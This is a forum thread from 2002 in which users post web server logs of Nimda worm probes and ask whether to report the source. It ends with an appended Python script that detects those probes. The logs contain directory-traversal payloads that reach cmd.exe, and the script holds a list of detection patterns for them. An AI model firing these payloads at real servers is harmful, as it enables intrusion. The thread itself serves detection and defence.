Is this really a Nimda infection attempt? - Windows & Software

Marsh Posted on 07-05-2002 at 15:18:13

In my Apache logs I have this:
193.252.2.7 - - [06/May/2002:19:53:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:19:53:11 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:04 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
 
Weird requests, aren't they?


---------------
I said left... François
Reply


Marsh Posted on 07-05-2002 at 15:19:25

Quite possible. Do a search, there has been at least one other thread about this recently.

Reply

Marsh Posted on 07-05-2002 at 15:26:42

Yes, it is an attempt.


---------------
APB
Reply

Marsh Posted on 07-05-2002 at 15:27:33

193.252.2.7, so what do I do with this one, do I notify Wanadoo or what?


---------------
I said left... François
Reply

Marsh Posted on 12-05-2002 at 21:14:31

So do I :
 
 
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)  
2002-05-12 00:28:54 80.14.229.234 - 80.14.119.57 80 GET /scripts/root.exe /c+dir 401 -
2002-05-12 00:28:55 80.14.229.234 - 80.14.119.57 80 GET /MSADC/root.exe /c+dir 403 -
2002-05-12 00:28:56 80.14.229.234 - 80.14.119.57 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:57 80.14.229.234 - 80.14.119.57 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:58 80.14.229.234 - 80.14.119.57 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:59 80.14.229.234 - 80.14.119.57 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:01 80.14.229.234 - 80.14.119.57 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:02 80.14.229.234 - 80.14.119.57 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-05-12 00:29:03 80.14.229.234 - 80.14.119.57 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:04 80.14.229.234 - 80.14.119.57 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
 
etc.... so indeed, what do we do, do we notify Wanadoo???

 

--Message edited by Jef34 on 12-05-2002 at 21:14:52--

Reply

Marsh Posted on 12-05-2002 at 21:16:19

By the way, what should one do to avoid getting infected??? Apart from antivirus etc...

 

--Message edited by Jef34 on 13-05-2002 at 09:31:31--

Reply

Marsh Posted on 13-05-2002 at 09:31:44

up

Reply

Marsh Posted on 13-05-2002 at 09:49:45

Do what I do: Apache + updates ;)


---------------
I said left... François
Reply

Marsh Posted on 13-05-2002 at 15:52:32

benwar wrote:

193.252.2.7, so what do I do with this one, do I notify Wanadoo or what?

The guy in question is infected. He is not a hacker! Notify him if you want or can. No point in warning abuse...


---------------
Well, what are you up to?
Reply
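A small triage script for the question raised in this thread (is this Nimda, and is the source a compromised machine rather than a person?), added here as an example and not taken from any poster: it parses both the Apache lines from the first post and the IIS W3C lines from Jef34's post, flags the request paths Nimda probes for, and reports per source IP how many probes were seen and whether any got a 2xx (every hit quoted here is a 4xx, so the servers were not vulnerable). The two log-format regexes and the pattern list are my assumptions, not something from the thread.

```python
import re
from collections import defaultdict
# URI fragments the Nimda worm (and the root.exe backdoor left by Code Red II)
# probes for, exactly as they appear in the logs quoted in this thread.
NIMDA_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"/root\.exe",                    # Code Red II backdoor reused by Nimda
    r"/winnt/system32/cmd\.exe",      # direct cmd.exe invocation
    r"%255c|%25%35%63|%%35%63",       # double-encoded backslash traversal
    r"%c0%af|%c0%2f|%c1%1c|%c1%9c",   # overlong UTF-8 traversal (IIS "unicode bug")
)]
# Apache common/combined format: client, timestamp, request line, status code (assumed layout).
APACHE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')
# IIS W3C extended format with the field order shown in the thread:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
IIS_RE = re.compile(r'^(\S+ \S+) (\S+) \S+ \S+ \d+ \S+ (\S+) (\S+) (\d{3})')

def parse_line(line):
    """Return (client_ip, uri, status) for either log format, or None."""
    m = APACHE_RE.match(line)
    if m:
        return m.group(1), m.group(3), int(m.group(4))
    m = IIS_RE.match(line)
    if m:
        query = "" if m.group(4) == "-" else "?" + m.group(4)
        return m.group(2), m.group(3) + query, int(m.group(5))
    return None

def is_nimda_probe(uri):
    return any(p.search(uri) for p in NIMDA_PATTERNS)

def summarize(lines):
    """Per source IP: how many worm probes were seen and how many got a 2xx."""
    report = defaultdict(lambda: {"probes": 0, "succeeded": 0})
    for line in lines:
        parsed = parse_line(line)
        if parsed and is_nimda_probe(parsed[1]):
            ip, status = parsed[0], parsed[2]
            report[ip]["probes"] += 1
            if 200 <= status < 300:       # a 2xx would mean the probe found its target
                report[ip]["succeeded"] += 1
    return dict(report)

SAMPLE_LINES = [   # two Apache and one IIS line from the thread, plus one constructed benign hit
    '193.252.2.7 - - [06/May/2002:19:53:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319',
    '193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341',
    '10.0.0.5 - - [06/May/2002:19:55:00 +0200] "GET /index.html HTTP/1.0" 200 1043',
    '2002-05-12 00:28:54 80.14.229.234 - 80.14.119.57 80 GET /scripts/root.exe /c+dir 401 -',
]
```

Run `summarize()` over a whole access log: one source IP firing the same fixed sequence of sixteen or so probes, twice, with only 4xx answers is the automated worm behaviour the last reply describes, whereas any `succeeded` count above zero is what would warrant an incident response rather than a note to the source's owner.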
